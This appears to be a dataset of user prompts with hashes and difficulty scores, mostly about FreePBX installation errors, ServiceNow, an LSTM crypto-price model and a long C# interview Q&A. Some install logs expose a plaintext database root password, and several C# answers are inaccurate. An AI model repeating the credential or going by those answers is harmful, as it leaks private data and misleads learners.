[root@localhost freepbx]# ./install -n --dbuser root --dbpass Ефкфы1313ЙЙ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
3fde0101e495abf64ccf595e7fe44599
|
{
"intermediate": 0.40178975462913513,
"beginner": 0.40040507912635803,
"expert": 0.1978052258491516
}
|
46,713
|
How to change the creation time of a file on Fedora?
|
d6e8f750fedcaefe37eac7e98dfa67a8
|
{
"intermediate": 0.32724684476852417,
"beginner": 0.19799171388149261,
"expert": 0.4747614562511444
}
|
46,714
|
What does this error mean:
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
PHP Fatal error: Uncaught Error: Call to undefined function FreePBX\Install\posix_geteuid() in /root/freepbx/installlib/installcommand.class.php:174
Stack trace:
#0 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Command/Command.php(255): FreePBX\Install\FreePBXInstallCommand->execute()
#1 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(960): Symfony\Component\Console\Command\Command->run()
#2 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(255): Symfony\Component\Console\Application->doRunCommand()
#3 /root/freepbx/amp_conf/htdocs/admin/libraries/Composer/vendor/symfony/console/Application.php(148): Symfony\Component\Console\Application->doRun()
#4 /root/freepbx/install(22): Symfony\Component\Console\Application->run()
#5 {main}
thrown in /root/freepbx/installlib/installcommand.class.php on line 174
|
ddf7c39f4667905e12944ed1a28abd2b
|
{
"intermediate": 0.40127623081207275,
"beginner": 0.48284026980400085,
"expert": 0.11588346213102341
}
|
46,715
|
What does this error mean
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
282fdf8a2c7e28447b7ab69473a45fe0
|
{
"intermediate": 0.436328262090683,
"beginner": 0.38379037380218506,
"expert": 0.17988140881061554
}
|
46,716
|
How to create a clone app like IMO Messenger
|
587c52f3c01396957a3c1f2d74d8dadb
|
{
"intermediate": 0.31889718770980835,
"beginner": 0.2218206375837326,
"expert": 0.45928213000297546
}
|
46,717
|
What does this error mean
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
6d8fc5db203f51a669dcad0ba70a7ca5
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,718
|
What does this error mean
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
9c551262ae028a7e3ced316eaf25bfd0
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,719
|
What does this error mean
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 16.15.1
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
PHP Fatal error: Declaration of FreePBX\Database::query() must be compatible with PDO::query(string $query, ?int $fetchMode = null, mixed ...$fetchModeArgs): PDOStatement|false in /root/freepbx/amp_conf/htdocs/admin/libraries/BMO/Database.class.php on line 239
|
c2a73d5b2e1b77642d6cd473dd94b0b7
|
{
"intermediate": 0.4554811120033264,
"beginner": 0.3687116205692291,
"expert": 0.17580726742744446
}
|
46,720
|
Error:
[root@localhost ~]# rm freepbx
rm: cannot remove 'freepbx': Is a directory
|
80d6b2310b2e9288c9100ba605480fef
|
{
"intermediate": 0.3496999740600586,
"beginner": 0.32951170206069946,
"expert": 0.32078832387924194
}
|
46,721
|
Dear GPT-4-Turbo, write me code that does a LOT of stuff that does nothing but use my PC's resources, only to print out at the end: "Man, idk. Too hard."
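A minimal Python sketch in the requested spirit (the amount of busywork is arbitrary):
import hashlib

digest = b"seed"
for _ in range(1_000_000):  # a LOT of stuff that accomplishes nothing
    digest = hashlib.sha256(digest).digest()

print("Man, idk. Too hard.")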
|
06df130d3f5a8f1f2c8a1829371932b3
|
{
"intermediate": 0.35028061270713806,
"beginner": 0.4122452139854431,
"expert": 0.2374742329120636
}
|
46,722
|
django get host name of requests.
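A minimal sketch of one common answer, assuming a standard Django view (the view name is made up): HttpRequest.get_host() returns the host (and port, if present) from the request, validated against ALLOWED_HOSTS.
from django.http import HttpResponse

def show_host(request):  # hypothetical view
    host = request.get_host()  # e.g. "example.com:8000"
    return HttpResponse(host)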
|
45f2cdda432d9886201b2a7057e76611
|
{
"intermediate": 0.5003438591957092,
"beginner": 0.18938149511814117,
"expert": 0.3102746903896332
}
|
46,723
|
I uploaded a background image for the Service Portal, and now I need to edit it so it fits the entire background; some contents of the image were missing from the display.
|
98d79fd07e1bac9c2754de9d4aa40516
|
{
"intermediate": 0.32987064123153687,
"beginner": 0.23681196570396423,
"expert": 0.4333174228668213
}
|
46,724
|
If the approval status is not yet 'requested', then update the work notes to "not reviewed" on the RITM in ServiceNow through a business rule.
|
a9e3293b575e4aeeb45a16ead3688cda
|
{
"intermediate": 0.43870821595191956,
"beginner": 0.2271784394979477,
"expert": 0.33411329984664917
}
|
46,725
|
In Python, given this string GPIB11::9::INSTR, I want to get the 9. How do I do it?
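A minimal sketch: VISA resource names are '::'-separated, so the primary address is simply the second field.
resource = "GPIB11::9::INSTR"
address = int(resource.split("::")[1])
print(address)  # prints 9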
|
635d9c8d3edfdfe4c1f335f5a269db98
|
{
"intermediate": 0.3439564108848572,
"beginner": 0.22977416217327118,
"expert": 0.42626944184303284
}
|
46,726
|
What is this error
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Error!
Error communicating with Asterisk. Ensure that Asterisk is properly installed and running as the asterisk user
Asterisk appears to be running as root
Try starting Asterisk with the './start_asterisk start' command in this directory
|
5416efa783b57885921d70d5e4df0244
|
{
"intermediate": 0.3567330241203308,
"beginner": 0.36019575595855713,
"expert": 0.2830711603164673
}
|
46,727
|
#include <bits/stdc++.h>
#define M 100002
using namespace std;

struct xau {
    string x; // the string itself
    int vt;   // original position, used as a tie-breaker
};
xau s[M];

// count the decimal digits in a.x
int demso(const xau &a) {
    int res = 0;
    for (int i = 0; i < (int)a.x.size(); i++)
        if (a.x[i] >= '0' && a.x[i] <= '9') res++;
    return res;
}

// order by digit count, then by original position (a strict weak ordering)
bool cmp(const xau &a, const xau &b) {
    int da = demso(a), db = demso(b);
    if (da != db) return da < db;
    return a.vt < b.vt;
}

int main() {
    ios_base::sync_with_stdio(false);
    cin.tie(0); cout.tie(0);
    freopen("BAI3.INP", "r", stdin);
    freopen("BAI3.OUT", "w", stdout);
    int n;
    cin >> n;
    for (int i = 1; i <= n; i++) { cin >> s[i].x; s[i].vt = i; }
    sort(s + 1, s + n + 1, cmp);
    for (int i = 1; i <= n; i++) cout << s[i].x << '\n';
    return 0;
}
|
a5b91c599c90c193b080402c2d17f6a9
|
{
"intermediate": 0.29181697964668274,
"beginner": 0.5319371819496155,
"expert": 0.17624574899673462
}
|
46,728
|
What is this error:
[root@localhost freepbx]# ./install -n --dbuser root --dbpass Taras1313QQ --webroot=/usr/share/nginx/html
Assuming you are Database Root
Checking if SELinux is enabled...Its not (good)!
Reading /etc/asterisk/asterisk.conf...Done
Checking if Asterisk is running and we can talk to it as the 'asterisk' user...Yes. Determined Asterisk version to be: 20.7.0
Checking if NodeJS is installed and we can get a version from it...Yes. Determined NodeJS version to be: 20.10.0
Preliminary checks done. Starting FreePBX Installation
Checking if this is a new install...Yes (No /etc/freepbx.conf file detected)
Database Root installation checking credentials and permissions..Connected!
Empty asterisk Database going to populate it
Updating tables admin, ampusers, cronmanager, featurecodes, freepbx_log, freepbx_settings, globals, module_xml, modules, notifications, cron_jobs...Done
Empty asteriskcdrdb Database going to populate it
Initializing FreePBX Settings
Changing AMPWEBROOT [/var/www/html] to match what was given at install time: /usr/share/nginx/html
Changing AMPMGRUSER [admin] to match what was given at install time: a1e9fcec4670fb9d130a94a58c30d6a1
Changing AMPMGRPASS [amp111] to match what was given at install time: 42cf523cec5432cc5197e40261450a62
Finished initalizing settings
Copying files (this may take a bit)....
17033/17033 [============================] 100%
Done
bin is: /var/lib/asterisk/bin
sbin is: /usr/sbin
Symlinking /var/lib/asterisk/bin/fwconsole to /usr/sbin/fwconsole ...Done
Symlinking /var/lib/asterisk/bin/amportal to /usr/sbin/amportal ...Done
Finishing up directory processes...Done!
Running variable replacement...Done
Creating missing #include files...Done
Setting up Asterisk Manager Connection...Done
Running through upgrades...
Checking for upgrades..
No further upgrades necessary
Finished upgrades
Setting FreePBX version to 17.0.15.2...Done
Writing out /etc/amportal.conf...Done
Writing out /etc/freepbx.conf...Done
Chowning directories...
Taking too long? Customize the chown command, See http://wiki.freepbx.org/display/FOP/FreePBX+Chown+Conf
Setting Permissions...
Setting base permissions...Done in 1 seconds
Setting specific permissions...
685 [============================]
Finished setting permissions
Done
Installing framework...
Unable to install module framework:
- PHP version 8.2.0 or higher is required, you have 8.1.24
Updating Hooks...Done
Chowning directories...Done
Unable to install module framework:
- PHP version 8.2.0 or higher is required, you have 8.1.24
Updating Hooks...Done
Chowning directories...Done
Done
Building Packaged Scripts...Done
Trusting FreePBX...Trusted
Installing base modules...Updating tables trunks, pjsip, sip, dahdi, iax, indications_zonelist, devices, users, incoming, dahdichandids, outbound_route_patterns, outbound_route_sequence, outbound_route_trunks, outbound_routes, outbound_route_email, trunk_dialpatterns...Done
Starting Call Transfer Monitoring Service
PM2 is not installed/enabled. Unable to start Call transfer monitoring
In install.php line 22:
Undefined array key "ASTVERSION"
moduleadmin [-f|--force] [-d|--debug] [--edge] [--ignorecache] [--stable] [--color] [--skipchown] [-e|--autoenable] [--skipdisabled] [--snapshot SNAPSHOT] [--format FORMAT] [-R|--repo REPO] [-t|--tag TAG] [--skipbreakingcheck] [--sendemail] [--onlystdout] [--] [<args>...]
In Process.php line 272:
The command "'/usr/sbin/fwconsole' 'ma' 'install' 'core' 'dashboard' 'sipsettings' 'voicemail' 'certman'" failed.
Exit Code: 2(Misuse of shell builtins)
Working directory: /root/freepbx
Output:
================
Error Output:
================
install [--dbengine DBENGINE] [--dbname DBNAME] [--dbhost DBHOST] [--dbport DBPORT] [--cdrdbname CDRDBNAME] [--dbuser DBUSER] [--dbpass DBPASS] [--user USER] [--group GROUP] [--dev-links] [--skip-install] [--webroot WEBROOT] [--astetcdir ASTETCDIR] [--astmoddir ASTMODDIR] [--astvarlibdir ASTVARLIBDIR] [--astagidir ASTAGIDIR] [--astspooldir ASTSPOOLDIR] [--astrundir ASTRUNDIR] [--astlogdir ASTLOGDIR] [--ampbin AMPBIN] [--ampsbin AMPSBIN] [--ampcgibin AMPCGIBIN] [--ampplayback AMPPLAYBACK] [-r|--rootdb] [-f|--force]
|
de7914802c56809693291b03caf3b9fa
|
{
"intermediate": 0.3576268255710602,
"beginner": 0.2880428433418274,
"expert": 0.3543303310871124
}
|
46,729
|
I have the following code to train an LSTM model on my historical crypto dataset:
# %%
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# %%
# Load the dataset
df = pd.read_csv("your_crypto_data.csv")
# Selecting the 'Close' column and converting it to numpy array
close_prices = df['Close'].values.reshape(-1, 1)
# Scale the data between 0 and 1
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(close_prices)
# Creating the dataset with 30 timesteps
x = []
y = []
for i in range(30, len(scaled_data)):
x.append(scaled_data[i-30:i, 0])
y.append(scaled_data[i, 0])
# %%
x, y = np.array(x), np.array(y)
# Splitting the dataset into training and testing
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=42)
# %%
# Reshape the data to fit the LSTM layer
x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))
x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))
# %%
Now, let's build the LSTM model:
model = Sequential()
# Adding the first LSTM layer with some Dropout regularisation
model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))
model.add(Dropout(0.2))
# Adding a second LSTM layer and some Dropout regularisation
model.add(LSTM(units=50, return_sequences=False))
model.add(Dropout(0.2))
# Adding the output layer
model.add(Dense(units=1))
# Compiling the RNN
model.compile(optimizer='adam', loss='mean_squared_error')
# Fitting the RNN to the Training set
model.fit(x_train, y_train, epochs=100, batch_size=32)
# %%
predicted_prices = model.predict(x_test)
predicted_prices = scaler.inverse_transform(predicted_prices) # Undo the scaling
# Visualising the results
plt.plot(scaler.inverse_transform(y_test.reshape(-1, 1)), color='red', label='Real Crypto Price')
plt.plot(predicted_prices, color='blue', label='Predicted Crypto Price')
plt.title('Crypto Price Prediction')
plt.xlabel('Time')
plt.ylabel('Crypto Price')
plt.legend()
plt.show()
Currently the model trains on just the close price,
but I have other features in my dataset, like open, close, high, volume, and so on.
Update the code so the model trains on all the features in my dataset and predicts the next day's close price based on the last 30 days.
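A minimal sketch of the key change, assuming the CSV has columns named 'Open', 'High', 'Low', 'Close' and 'Volume' (adjust to the real names): scale all feature columns together, build windows of shape (30, n_features), and keep the index of 'Close' so its scaling can be inverted later.
import numpy as np
import pandas as pd
from sklearn.preprocessing import MinMaxScaler

df = pd.read_csv("your_crypto_data.csv")  # placeholder file name from the question
cols = ["Open", "High", "Low", "Close", "Volume"]
scaled = MinMaxScaler(feature_range=(0, 1)).fit_transform(df[cols].values)

close_idx = cols.index("Close")
x, y = [], []
for i in range(30, len(scaled)):
    x.append(scaled[i - 30:i, :])   # all features over the last 30 days
    y.append(scaled[i, close_idx])  # next day's (scaled) close

x, y = np.array(x), np.array(y)     # x has shape (samples, 30, len(cols))
# the first LSTM layer then takes input_shape=(30, x.shape[2]) instead of (30, 1)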
|
8f2840d1ce17ef2b6ca7a5f3d3c250d4
|
{
"intermediate": 0.3789866864681244,
"beginner": 0.32348233461380005,
"expert": 0.2975309193134308
}
|
46,730
|
1. What is C#?
C# is an object-oriented programming language compiled by the .Net framework to generate Microsoft Intermediate Language.
Can multiple catch blocks be executed?
No, you cannot execute multiple catch blocks of the same type.
2. What is the difference between static, public, and void?
Public declared variables can be accessed from anywhere in the application. Static declared variables can be accessed globally without needing to create an instance of the class. Void is a return type that indicates a method does not return a value in C#.
3. What is an object?
An object is a class instance that can be used to access class methods. The "New" keyword can be used to construct an object.
4. Define Constructors.
A constructor is a member function with the same name as its class. The constructor is automatically invoked when an object is created. While the class is being initialized, it constructs all the values of data members.
5. What are Jagged Arrays?
The Array which comprises elements of type array is called Jagged Array. The elements in Jagged Arrays can be of various dimensions and sizes.
6. What is the difference between out and ref parameters?
When an argument is passed as a ref, it must be initialized before it can be passed to the method. An out parameter, on the other hand, need not to be initialized before passing to a method.
7. What is the benefit of ‘using’ statement in C#?
The ‘using’ statement can be used in order to obtain a resource for processing before automatically disposing it when execution is completed.
8. What is serialization?
In order to transport an object through a network, we would need to convert it into a stream of bytes. This process is called Serialization.
9. Can “this” command be used within a static method?
No. This is because only static variables/methods can be used in a static method.
10. Differentiate between Break and Continue Statement.
Continue statement - Used in jumping over a particular iteration and getting into the next iteration of the loop.
Break statement - Used to skip the next statements of the current iteration and come out of the loop.
11. List the different types of comments in C#.
The different types of comments in C# are:
XML comments
Example -
/// example of XML comment
Single Line comments
Example -
// example of single-line comment
Multi-line comments
Example -
/* example of an
multiline comment */
12. Explain the four steps involved in the C# code compilation.
Four steps of code compilation in C# include -
Source code compilation in managed code.
Newly created code is clubbed with assembly code.
The Common Language Runtime (CLR) is loaded.
Assembly execution is done through CLR.
13. Discuss the various methods to pass parameters in a method.
The various methods of passing parameters in a method include -
Output parameters: Lets the method return more than one value.
Value parameters: The formal value copies and stores the value of the actual argument, which enables the manipulation of the formal parameter without affecting the value of the actual parameter.
Reference parameters: The memory address of the actual parameter is stored in the formal argument, which means any change to the formal parameter would reflect on the actual argument too.
14. Name all the C# access modifiers.
The C# access modifiers are -
Private Access Modifier - A private attribute or method is one that can only be accessed from within the class.
Public Access Modifier - When an attribute or method is declared public, it can be accessed from anywhere in the code.
Internal Access Modifier - When a property or method is defined as internal, it can only be accessible from the current assembly point of that class.
Protected Access Modifier - When a user declares a method or attribute as protected, it can only be accessed by members of that class and those who inherit it.
15. Mention all the advantages of C#.
The following are the advantages of C# -
C# is component-oriented.
It is an object-oriented language.
The syntax is really easy to grasp.
It is easier to learn.
C# is part of the framework called .NET
16. Mention the important IDEs for C# development provided by Microsoft.
The following IDEs’ are useful in C# development -
MonoDevelop
Visual Studio Code (VS Code)
Browxy
Visual Studio Express (VSE)
Visual Web Developer (VWD)
17. Why do we use C# language?
Below are the reasons why we use the C# language -
C# is a component-oriented language.
It is easy to pass parameters in the C# language.
The C# language can be compiled on many platforms.
The C# language follows a structured approach.
It is easy to learn and pick up.
The C# language produces really efficient and readable programmes.
18. Mention the features of C# briefly.
Some of the main features of C# are -
C# is a safely typed and managed language.
C# is object-oriented in nature.
C# is a Cross-platform friendly language.
C# is a platform-independent language when it comes to compilation.
C# is general purpose in nature.
C# is used in implementing Destructors and Constructors.
C# is part of the .NET framework.
C# is an easy-to-learn and easy-to-grasp language.
C# is a structured language.
19. What is meant by Unmanaged or Managed Code?
In simple terms, managed code is code that is executed by the CLR (Common Language Runtime). This means that every application code is totally dependent on the .NET platform and is regarded as overseen in light of it. Code executed by a runtime programme that is not part of the .NET platform is considered unmanaged code. Memory, security, and other activities related to execution will be handled by the application's runtime.
20. What is meant by an Abstract Class?
It's a type of class whose objects can't be instantiated, and it's signified by the term 'abstract'. It consists of a methodology or a single approach.
21. Differentiate between finally blocks and Finalize.
The finally block runs once the try and catch blocks have completed, as part of exception handling. It executes whether or not the exception has been caught, and it generally contains cleanup code.
The Finalize method is called just before garbage collection. Its main purpose is to clean up unmanaged resources, and it is triggered automatically whenever an instance is no longer referenced.
22. What is meant by an Interface?
An interface is a class that does not have any implementation. Only the declarations of events, properties, and attributes are included.
23. What is meant by a Partial Class?
A partial class effectively breaks a class's definition into various classes in the same or other source code files. A class definition can be written in numerous files, but it is compiled as a single class at runtime, and when a class is formed, all methods from all source files can be accessed using the same object. The keyword 'partial' denotes this.
24. What is the difference between read-only and constants?
During the time of compilation, constant variables are declared as well as initialized. It’s not possible to change this particular value later. On the other hand, read-only is used after a value is assigned at run time.
25. What is an interface class?
An interface class is an abstract class with only public abstract methods. Only declaration is there in these methods, but not the definition. They must be implemented in the inherited classes.
26. What are reference types and value types?
A value type holds a data value inside its memory space. Reference type, on the other hand, keeps the object’s address where the value is stored. It is, essentially, a pointer to a different memory location.
27. What are User Control and Custom Control?
Custom Controls are produced as compiled code. These are easy to use and can be added to the toolbox. Developers can drag and drop these controls onto their web forms. User Controls are almost the same as ASP include files. They are also easy to create. User controls, however, can’t be put in the toolbox. They also can’t be dragged and dropped from it.
28. What are sealed classes in C#?
When a restriction needs to be placed on the class that needs to be inherited, sealed classes are created. In order to prevent any derivation from a class, a sealed modifier is used. Compile-time error occurs when a sealed class is forcefully specified as a base class.
29. What is method overloading?
Method overloading is the process of generating many methods in the same class with the same name but distinct signatures. The compiler utilizes overload resolution to identify which method to invoke when we compile.
30. What is the difference between Arraylist and Array?
An array only has items of the same type, and its size is fixed. An ArrayList is similar, but it does not have a fixed size.
31. Is it possible for a private virtual method to be overridden?
A private virtual method cannot be overridden as it can’t be accessed outside the class.
32. Describe the accessibility modifier “protected internal”.
Variables or methods that are Protected Internal can be accessed within the same assembly as well as from the classes which have been derived from the parent class.
33. What are the differences between System.String and System.Text.StringBuilder classes?
System.String is absolute. When a string variable’s value is modified, a new memory is assigned to the new value. The previous memory allocation gets released. System.StringBuilder, on the other hand, is designed so it can have a mutable string in which a plethora of operations can be performed without the need for allocation of a separate memory location for the string that has been modified.
34. What’s the difference between the System.Array.CopyTo() and System.Array.Clone() ?
In the Clone() method, a new array object is created, with all the original Array elements using the CopyTo() method. Essentially, all the elements present in the existing array get copied into another existing array.
35. How can the Array elements be sorted in descending order?
You can use the Sort() method and then the Reverse() method.
36. What’s the difference between an abstract and interface class?
All methods in interfaces have only a declaration but no definition. We can have some strong methods in an abstract class. All methods in an interface class are public. Private methods may exist in an abstract class.
37. What is the difference between Dispose() and Finalize()methods?
Dispose() is used when an object is required to release any unmanaged resources in it. Finalize(), on the other hand, doesn’t assure the garbage collection of an object even though it is used for the same function.
38. What are circular references?
When two or more resources are dependent on each, it causes a lock condition, and the resources become unusable. This is called a circular reference.
39. What are generics in C# .NET?
In order to reduce code redundancy, raise type safety, and performance, generics can be used in order to make code classes that can be reused. Collection classes can be created using generics.
40. What is an object pool in .NET?
A container that has objects which are ready to be used is known as an object pool. It helps in tracking the object which is currently in use and the total number of objects present in the pool. This brings down the need for creating and re-creating objects.
41. List down the most commonly used types of exceptions in .NET
Commonly used types of exceptions in .NET are:
ArgumentException
ArithmeticException
DivideByZeroException
OverflowException
InvalidCastException
InvalidOperationException
NullReferenceException
OutOfMemoryException
StackOverflowException
42. What are Custom Exceptions?
In some cases, errors have to be handled according to user requirements. Custom exceptions are used in such cases.
43. What are delegates?
Delegates are essentially the same as function pointers in C++. The main and only difference between the two is delegates are type safe while function pointers are not. Delegates are essential because they allow for the creation of generic type-safe functions.
44. What is the difference between method overriding and method overloading?
In method overriding, the relevant method definition is replaced in the derived class, which changes the method behavior. When it comes to method overloading, a method is created with the same name and is in the same class while having different signatures.
45. How do you inherit a class into another class in C#?
In C#, colon can be used as an inheritance operator. You need to place a colon and follow it with the class name.
46. What are the various ways that a method can be overloaded?
Different data types can be used for a parameter in order for a method to be overloaded; different orders of parameters as well as different numbers of parameters can be used.
47. Why can't the accessibility modifier be specified for methods within the interface?
In an interface, there are virtual methods which do not come with method definition. All the methods present are to be overridden in the derived class. This is the reason they are all public.
48. How can we set the class to be inherited, but prevent the method from being overridden?
To set the class to be inherited, it needs to be declared as public. The method needs to be sealed to prevent any overrides.
49. What happens if the method names in the inherited interfaces conflict?
A problem could arise when the methods from various interfaces expect different data. But when it comes to the compiler itself, there shouldn’t be an issue.
50. What is the difference between a Struct and a Class?
Structs are essentially value-type variables, whereas classes would be reference types.
51. How to use nullable types in .Net?
When either normal values or a null value can be taken by value types, they are called nullable types.
52. How can we make an array with non-standard values?
An array with non-default values can be created using Enumerable.Repeat.
53. What is the difference between “is” and “as” operators in c#?
An “is” operator can be used to check an object’s compatibility with respect to a given type, and the result is returned as a Boolean. An “as” operator can be used for casting an object to either a type or a class.
54. What is a multicast delegate?
Multicast delegate is when a single delegate comes with multiple handlers. Each handler is assigned to a method.
55. What are indexers in C# .NET?
In C#, indexers are called smart arrays. Indexers allow class instances to be indexed in the same way as arrays do.
56. What is the distinction between "throw" and "throw ex" in.NET?
“Throw” statement keeps the original error stack. But “throw ex” keeps the stack trace from their throw point.
57. What are C# attributes and its significance?
C# gives developers an option to define declarative tags on a few entities. For instance, class and method are known as attributes. The information related to the attribute can be retrieved during runtime by taking the help of Reflection.
58. In C#, how do you implement the singleton design pattern?
In a singleton pattern, a class is allowed to have only one instance, and an access point is provided to it globally.
59. What's the distinction between directcast and ctype?
If an object is required to have the run-time type similar to a different object, then DirectCast is used to convert it. When the conversion is between the expression as well as the type, then Ctype is used.
60. Is C# code managed or unmanaged code?
C# is a managed code as the runtime of Common language can compile C# code to Intermediate language.
61. What is a Console application?
An application that is able to run in the command prompt window is called a console application.
62. What are namespaces in C#?
Namespaces allow you to keep one set of names that is different from others. A great advantage of namespace is that class names declared in one namespace don’t clash with those declared in another namespace.
63. What can be members of a namespace?
Namespaces, interfaces, structures, and delegates can all be members.
64. Write features of Generics in C#?
Generics is a technique to improve your program in various ways including creating generic classes and reusing code.
65. Difference between SortedList and SortedDictionary in C#.
SortedList is a collection of value pairs sorted by their keys. SortedDictionary is a collection to store the value pairs in the sorted form, in which the sorting is done on the key.
66. What is Singleton design pattern in C#?
Singleton design pattern in C# has just one instance that gives global access to it.
67. What is tuple in C#?
Tuple is a data structure to represent a data set that has multiple values that could be related to each other.
68. What are Events?
An event is a notice that something has occurred.
69. What is the Constructor Chaining in C#?
With Constructor Chaining, an overloaded constructor can be called from another constructor. The constructor must belong to the same class.
70. What is a multicasting delegate in C#?
Multicasting of delegates helps users to point to more than one method in a single call.
71. What are Accessibility Modifiers in C#?
Access Modifiers are terms that specify a program's member, class, or datatype's accessibility.
72. What is a Virtual Method in C#?
In the parent class, a virtual method is declared that can be overridden in the child class. We construct a virtual method in the base class using the virtual keyword, and that function is overridden in the derived class with the Override keyword.
73. What is Multithreading with .NET?
Multi-threading refers to the use of multiple threads within a single process. Each thread here performs a different function.
74. In C#, what is a Hash table class?
The Hash table class represents a collection of key/value pairs that are organized based on the hash code of the key.
75. What is LINQ in C#?
LINQ refers to Language Integrated Query. It provides .NET languages (like C#) the ability to generate queries to retrieve data from the data source.
76. Why can't a private virtual procedure in C# be overridden?
Private virtual methods are not accessible outside of the class.
77. What is File Handling in C#?
File handling includes operations such as creating the file, reading from the file, and appending the file, among others.
78. What do you understand about Get and Set Accessor properties?
In C#, Get and Set are termed accessors because they use properties. Such private fields are accessed via accessors.
79. What is the Race condition in C#?
When 2 threads access the same resource and try to change it at the same time, we have a race condition.
80. Why are Async and Await used in C#?
Asynchronous programming processes execute independently of the primary or other processes. Asynchronous methods in C# are created using the Async and Await keywords.
81. What is an Indexer in C#?
An indexer is a class property that allows you to access a member variable of another class using array characteristics.
82. What is Thread Pooling in C#?
In C#, a Thread Pool is a group of threads. These threads are used to do work without interfering with the principal thread's operation.
83. What information can you provide regarding the XSD file in C#?
XSD stands for XML Schema Definition. The XML file can have any attributes and elements if there is no XSD file associated with it.
84. What are I/O classes in C#?
In C#, the System.IO namespace contains multiple classes that are used to conduct different file operations such as creation, deletion, closure, and opening.
85. What exactly do you mean by regular expressions in C#?
A regular expression is a pattern that can be used to match a set of input. Constructs, character literals, and operators are all possible.
Answer these questions in English, together with sample code.
|
87b9015e0310dd2c76ac05ad504e7ec2
|
{
"intermediate": 0.4112328886985779,
"beginner": 0.35719913244247437,
"expert": 0.23156793415546417
}
|
46,731
|
1. Write a SQL query to find the second highest salary from the table emp. (Column name – id, salary)
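One common answer, shown as a runnable Python/sqlite3 sketch (the sample rows are made up):
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE emp (id INTEGER, salary INTEGER)")
con.executemany("INSERT INTO emp VALUES (?, ?)", [(1, 100), (2, 300), (3, 200)])

query = """
    SELECT MAX(salary) AS second_highest
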